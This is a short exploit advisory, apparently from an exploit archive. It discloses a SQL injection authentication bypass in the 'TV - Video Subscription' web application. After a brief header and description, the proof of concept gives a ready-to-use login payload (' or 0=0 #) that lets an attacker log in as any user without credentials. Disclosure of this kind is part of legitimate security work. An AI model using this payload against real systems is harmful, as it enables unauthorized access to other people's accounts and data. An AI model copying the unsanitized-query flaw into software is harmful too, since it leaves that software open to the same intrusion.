TV Video Subscription suffers from a remote SQL injection vulnerability that allows for authentication bypass.
dd5d0bb325041f3861fe29a8743a24d6bc0392a1badf9c45368714c8ac5c7dee
# Exploit Title: TV - Video Subscription - Authentication Bypass
# Dork: N/A
# Date: 2018-02-14
# Exploit Author: Borna nematzadeh (L0RD) or borna.nematzadeh123@gmail.com
# Vendor Homepage: https://codecanyon.net/item/tv-video-subscription/13966427?s_rank=1677
# Version: All version
# Category: Webapps
# CVE: N/A
# # # # #
# Description:
# With this exploit,attacker can login as any user without any
authentication.
# # # # #
# Proof of Concept :
1) Go to login page .
2) Username : anything@anything.anything
Password : ' or 0=0 #